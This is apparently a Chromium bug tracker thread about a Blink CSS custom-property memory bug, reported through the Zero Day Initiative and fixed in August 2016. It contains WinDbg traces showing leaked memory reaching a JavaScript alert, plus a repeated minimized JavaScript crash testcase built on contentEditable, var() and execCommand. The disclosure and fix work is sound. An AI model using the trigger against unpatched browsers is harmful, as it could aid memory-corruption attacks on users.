chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x9b: 00007ffd`e3af6307 742a je chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xc7 (00007ffd`e3af6333) [br=0] 0:000> t chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x9d: 00007ffd`e3af6309 8b45f0 mov eax,dword ptr [rbp-10h] ss:00000012`f836bdb0=00000021 0:000> t chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xa0: 00007ffd`e3af630c 3b4104 cmp eax,dword ptr [rcx+4] ds:000004f2`9c0780f4=00000021 0:000> t chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xa3: 00007ffd`e3af630f 7322 jae chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xc7 (00007ffd`e3af6333) [br=1] 0:000> t chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xc7: 00007ffd`e3af6333 458bc7 mov r8d,r15d 0:000> t chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xca: 00007ffd`e3af6336 488d5538 lea rdx,[rbp+38h] 0:000> t chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xce: 00007ffd`e3af633a 488d4dd8 lea rcx,[rbp-28h] 0:000> t chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xd2: 00007ffd`e3af633e e8354771fe call chrome_child!WTF::StringBuilder::append (00007ffd`e220aa78) 0:000> p chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xd7: 00007ffd`e3af6343 488d5528 lea rdx,[rbp+28h] 0:000> t chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xdb: 00007ffd`e3af6347 488bcb mov rcx,rbx 0:000> t chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xde: 00007ffd`e3af634a e8194ffaff call chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText (00007ffd`e3a9b268) 0:000> t chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText: 00007ffd`e3a9b268 4053 push rbx 0:000> t chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x2: 00007ffd`e3a9b26a 4883ec30 sub rsp,30h 0:000> t chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x6: 00007ffd`e3a9b26e 488bda mov rbx,rdx 0:000> t chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x9: 00007ffd`e3a9b271 488b5110 mov rdx,qword ptr [rcx+10h] ds:000003f6`9bc83a88=0000000000000000 0:000> dq @rcx 000003f6`9bc83a78 00000000`00008000 0000023f`c54531a8 000003f6`9bc83a88 00000000`00000000 00000000`00000000 000003f6`9bc83a98 00000000`00000000 00000000`00000000 000003f6`9bc83aa8 00000000`00000000 00000000`00000000 000003f6`9bc83ab8 00000000`00000000 00000000`00000000 000003f6`9bc83ac8 00000000`00000000 00000000`00000000 000003f6`9bc83ad8 00000000`00000000 00000000`00000000 000003f6`9bc83ae8 00000000`00000000 00000000`00000000 0:000> t chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0xd: 00007ffd`e3a9b275 4885d2 test rdx,rdx 0:000> t chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x10: 00007ffd`e3a9b278 7428 je chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x3a (00007ffd`e3a9b2a2) [br=1] 0:000> t chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x3a: 00007ffd`e3a9b2a2 e86df177fe call chrome_child!WTF::emptyString (00007ffd`e221a414) 0:000> p chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x3f: 00007ffd`e3a9b2a7 488b08 mov rcx,qword ptr [rax] ds:0000023f`c5410090=000004f29c004000 0:000> t chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x42: 00007ffd`e3a9b2aa 48890b mov qword ptr [rbx],rcx ds:00000012`f836bde8=0000000000000000 0:000> t chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x45: 00007ffd`e3a9b2ad 4885c9 test rcx,rcx 0:000> t chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x48: 00007ffd`e3a9b2b0 7402 je chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x4c (00007ffd`e3a9b2b4) [br=0] 0:000> t chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x4a: 00007ffd`e3a9b2b2 ff01 inc dword ptr [rcx] ds:000004f2`9c004000=0000004a 0:000> t chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x4c: 00007ffd`e3a9b2b4 488bc3 mov rax,rbx 0:000> t chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x4f: 00007ffd`e3a9b2b7 4883c430 add rsp,30h 0:000> t chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x53: 00007ffd`e3a9b2bb 5b pop rbx 0:000> t chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x54: 00007ffd`e3a9b2bc c3 ret 0:000> bl 0 e 00007ffd`e3b20b8f 0001 (0004) 0:**** chrome_child!blink::CSSPropertyParser::parseValueStart+0x57 1 e 00007ffd`e3af62be 0001 (0001) 0:**** chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x52 2 e 0000023f`c54531b4 r 1 0001 (0001) 0:**** 3 e 00007ffd`e3cb3a94 0001 (0001) 0:**** chrome_child!blink::ChromeClient::openJavaScriptAlert 0:000> bd 0-2 0:000> g Breakpoint 3 hit chrome_child!blink::ChromeClient::openJavaScriptAlert: 00007ffd`e3cb3a94 4053 push rbx 0:000> db poi(@r8)+c 000004f2`9c1a416c 3c 00 66 00 69 00 67 00-75 00 72 00 65 00 20 00 <.f.i.g.u.r.e. . 000004f2`9c1a417c 73 00 74 00 79 00 6c 00-65 00 3d 00 22 00 66 00 s.t.y.l.e.=.".f. 000004f2`9c1a418c 6c 00 6f 00 61 00 74 00-3a 00 20 00 76 00 61 00 l.o.a.t.:. .v.a. 000004f2`9c1a419c 72 00 28 00 2d 00 2d 00-43 00 43 00 43 00 43 00 r.(.-.-.C.C.C.C. 000004f2`9c1a41ac 29 00 3b 00 20 00 f2 04-00 00 00 e5 00 9c f2 04 ).;. ........... 000004f2`9c1a41bc 00 00 04 00 00 00 50 00-57 00 4e 00 45 00 44 00 ......P.W.N.E.D. 000004f2`9c1a41cc 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 000004f2`9c1a41dc 00 00 00 00 02 3f c5 45-32 18 00 00 00 00 00 00 .....?.E2....... 0:000> vertarget Windows 10 Version 10586 MP (4 procs) Free x64 Product: WinNt, suite: SingleUserTS kernelbase.dll version: 10.0.10586.306 (th2_release_sec.160422-1850) Machine Name: Debug session time: Tue Jun 14 17:57:03.575 2016 (UTC - 5:00) System Uptime: 0 days 4:59:37.015 Process Uptime: 0 days 0:05:01.854 Kernel time: 0 days 0:00:00.109 User time: 0 days 0:00:00.187 ``` -- CREDIT --------------------------------------- This vulnerability was discovered by: 62600BCA031B9EB5CB4A74ADDDD6771E working with Trend Micro's Zero Day Initiative -- FURTHER DETAILS ------------------------------ If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number. Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 120 days of the reported date. If you are ready to release a patch at any point leading up to the deadline, please coordinate with us so that we may release our advisory detailing the issue. If the 120-day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations, so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time: Zero Day Initiative zdi-disclosures@trendmicro.com The PGP key used for all ZDI vendor communications is available from: http://www.zerodayinitiative.com/documents/disclosures-pgp-key.asc -- INFORMATION ABOUT THE ZDI --------------------- Established by TippingPoint and acquired by Trend Micro, the Zero Day Initiative (ZDI) neither re-sells vulnerability details nor exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its Trend Micro TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Please contact us for further details or refer to: http://www.zerodayinitiative.com -- DISCLOSURE POLICY ---------------------------- Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/
,
Jun 22 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=6340138707976192
,
Jun 22 2016
Looks like the code in question came from crrev.com/1405293012. +alancutter and +timloh, who reviewed the CL. Can you take a look at this and verify if it's an issue?
,
Jun 22 2016
,
Jun 24 2016
Tentatively assigning labels
,
Jun 24 2016
alancutter@ is away for the next week. Reassigning to timloh - can you have a look at this and triage?
,
Jun 24 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5690139632467968
,
Jun 24 2016
,
Jun 26 2016
,
Jun 27 2016
mergeStyle() looks like it handles custom properties badly. Doesn't seem to repro in ToT, not sure why. Will look more into this later.
,
Jun 29 2016
,
Jul 5 2016
I could re-produce this with poc2.html attached in CF Crash Report at #c7 with today's ToT.
This is DCHECK() in toCSSCustomPropertyDeclaration() call, where |property.value().m_class| is VariableReferenceClass(32) instead of CustomPropertyDeclarationClass.
I'm not sure whether VariableReferenceClass implies CustomPropertyDeclarationClass or not.
bool MutableStylePropertySet::setProperty(const CSSProperty& property, CSSProperty* slot)
{
if (!removeShorthandProperty(property.id())) {
const AtomicString& name = (property.id() == CSSPropertyVariable) ?
toCSSCustomPropertyDeclaration(property.value())->name() : nullAtom;
,
Jul 6 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5368642518908928
,
Jul 6 2016
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5368642518908928 Job Type: linux_asan_chrome_mp Platform Id: linux Crash Type: ASSERT Crash Address: Crash State: !value || (value->isCustomPropertyDeclaration()) blink::MutableStylePropertySet::setProperty blink::MutableStylePropertySet::addParsedProperties Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=365683:366004 Minimized Testcase (0.67 Kb): Download: https://cluster-fuzz.appspot.com/download/AMIfv94T5Yq8K67FKD5FPNGltSu9r7Zubq14IMGSBsv8DyCPfvpS9g3ACgRgx4s1ZjbygrfqGgzwANriIhIxmQFs7XVSR8qYrykNlJdUwNHUd-xZsec8eV4jl8nUDa2JHYxhYREWmgLIAvwnIe3B-td_L8v88kODDg?testcase_id=5368642518908928 <script> document.documentElement.contentEditable="true" document.documentElement.appendChild(document.createElement('table')) eAcronym = document.createElement('acronym') document.documentElement.appendChild(eAcronym) document.documentElement.appendChild(document.createElement('keygen')) newElem = document.createElement('figure') newElem.style.cssText = '--AAAA: var(--BBBB)' document.documentElement.appendChild(newElem) eCite = document.createElement('cite') eCite.style.cssText = 'float: var(--CCCC)' eAcronym.appendChild(eCite) eCite.appendChild(document.createElement('marquee')); document.execCommand('SelectAll') document.execCommand('RemoveFormat') </script> See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.
,
Jul 13 2016
timloh: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Jul 27 2016
timloh: Uh oh! This issue still open and hasn't been updated in the last 28 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Aug 9 2016
The following revision refers to this bug: https://chromium.googlesource.com/chromium/src.git/+/aadb63893e4c1358d1e5139aa29552eb190682c8 commit aadb63893e4c1358d1e5139aa29552eb190682c8 Author: timloh <timloh@chromium.org> Date: Tue Aug 09 08:19:22 2016 Fix EditingStyle::mergeStyle()'s handling of custom properties This patch fixes the logic of EditingStyle::mergeStyle() to correctly handle custom properties. Currently it serializes the CSSValue and then reparses it, which, aside from being inefficient, doesn't work for custom properties as the custom property name is lost (since we only have the enum value CSSPropertyVariable). BUG= 622420 Review-Url: https://codereview.chromium.org/2103043004 Cr-Commit-Position: refs/heads/master@{#410614} [modify] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/core.gypi [modify] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/css/StylePropertySet.cpp [modify] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/editing/EditingStyle.cpp [modify] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/editing/EditingStyle.h [add] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/editing/EditingStyleTest.cpp
,
Aug 10 2016
ClusterFuzz has detected this issue as fixed in range 410604:410621. Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5690139632467968 Job Type: linux_asan_chrome_mp Platform Id: linux Crash Type: Crash Address: Crash State: Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=410604:410621 Unminimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv962bJmF4zCnXnYhCsNwGmpOsoyg_7y-hF-5IruojcMrjlEiXI4QncSyk_zgZ4ntVVap84IqTY30vDXdTscTiROgCL8PhmVfYYuVq49UoyPo18gZkr8bAlg7hJt9Wv-4R2PLM7svT_iYTbe_mRGu7sWzMxHz1w?testcase_id=5690139632467968 See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information. If you suspect that the result above is incorrect, try re-doing that job on the test case report page.
,
Aug 10 2016
Fixed as per #18.
,
Aug 10 2016
ClusterFuzz has detected this issue as fixed in range 410604:410621. Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5368642518908928 Job Type: linux_asan_chrome_mp Platform Id: linux Crash Type: ASSERT Crash Address: Crash State: !value || (value->isCustomPropertyDeclaration()) blink::MutableStylePropertySet::setProperty blink::MutableStylePropertySet::addParsedProperties Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=365683:366004 Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=410604:410621 Minimized Testcase (0.67 Kb): Download: https://cluster-fuzz.appspot.com/download/AMIfv94T5Yq8K67FKD5FPNGltSu9r7Zubq14IMGSBsv8DyCPfvpS9g3ACgRgx4s1ZjbygrfqGgzwANriIhIxmQFs7XVSR8qYrykNlJdUwNHUd-xZsec8eV4jl8nUDa2JHYxhYREWmgLIAvwnIe3B-td_L8v88kODDg?testcase_id=5368642518908928 <script> document.documentElement.contentEditable="true" document.documentElement.appendChild(document.createElement('table')) eAcronym = document.createElement('acronym') document.documentElement.appendChild(eAcronym) document.documentElement.appendChild(document.createElement('keygen')) newElem = document.createElement('figure') newElem.style.cssText = '--AAAA: var(--BBBB)' document.documentElement.appendChild(newElem) eCite = document.createElement('cite') eCite.style.cssText = 'float: var(--CCCC)' eAcronym.appendChild(eCite) eCite.appendChild(document.createElement('marquee')); document.execCommand('SelectAll') document.execCommand('RemoveFormat') </script> See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information. If you suspect that the result above is incorrect, try re-doing that job on the test case report page.
,
Aug 10 2016
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5368642518908928 Job Type: linux_asan_chrome_mp Platform Id: linux Crash Type: ASSERT Crash Address: Crash State: !value || (value->isCustomPropertyDeclaration()) blink::MutableStylePropertySet::setProperty blink::MutableStylePropertySet::addParsedProperties Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=365683:366004 Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=410604:410621 Minimized Testcase (0.67 Kb): Download: https://cluster-fuzz.appspot.com/download/AMIfv94T5Yq8K67FKD5FPNGltSu9r7Zubq14IMGSBsv8DyCPfvpS9g3ACgRgx4s1ZjbygrfqGgzwANriIhIxmQFs7XVSR8qYrykNlJdUwNHUd-xZsec8eV4jl8nUDa2JHYxhYREWmgLIAvwnIe3B-td_L8v88kODDg?testcase_id=5368642518908928 <script> document.documentElement.contentEditable="true" document.documentElement.appendChild(document.createElement('table')) eAcronym = document.createElement('acronym') document.documentElement.appendChild(eAcronym) document.documentElement.appendChild(document.createElement('keygen')) newElem = document.createElement('figure') newElem.style.cssText = '--AAAA: var(--BBBB)' document.documentElement.appendChild(newElem) eCite = document.createElement('cite') eCite.style.cssText = 'float: var(--CCCC)' eAcronym.appendChild(eCite) eCite.appendChild(document.createElement('marquee')); document.execCommand('SelectAll') document.execCommand('RemoveFormat') </script> See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.
,
Aug 10 2016
,
Aug 10 2016
,
Aug 10 2016
Your change meets the bar and is auto-approved for M53 (branch: 2785)
,
Aug 11 2016
Please merge your change to M53 branch 2785 ASAP (latest before 5:00 PM PT, Friday 08/12) so we can take it in for next week beta. Thank you.
,
Aug 12 2016
The following revision refers to this bug: https://chromium.googlesource.com/chromium/src.git/+/ed9e60bc6238f29c78a85229e57a07256c4f66e4 commit ed9e60bc6238f29c78a85229e57a07256c4f66e4 Author: Timothy Loh <timloh@chromium.org> Date: Fri Aug 12 04:33:40 2016 Fix EditingStyle::mergeStyle()'s handling of custom properties This patch fixes the logic of EditingStyle::mergeStyle() to correctly handle custom properties. Currently it serializes the CSSValue and then reparses it, which, aside from being inefficient, doesn't work for custom properties as the custom property name is lost (since we only have the enum value CSSPropertyVariable). BUG= 622420 Review-Url: https://codereview.chromium.org/2103043004 Cr-Commit-Position: refs/heads/master@{#410614} (cherry picked from commit aadb63893e4c1358d1e5139aa29552eb190682c8) Review URL: https://codereview.chromium.org/2245573002 . Cr-Commit-Position: refs/branch-heads/2785@{#574} Cr-Branched-From: 68623971be0cfc492a2cb0427d7f478e7b214c24-refs/heads/master@{#403382} [modify] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/core.gypi [modify] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/css/StylePropertySet.cpp [modify] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/editing/EditingStyle.cpp [modify] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/editing/EditingStyle.h [add] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/editing/EditingStyleTest.cpp
,
Aug 24 2016
,
Aug 24 2016
,
Aug 26 2016
,
Sep 14 2016
,
Nov 16 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Apr 25 2018
|
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by zdi-disc...@hp.com
, Jun 22 2016498 bytes
498 bytes Download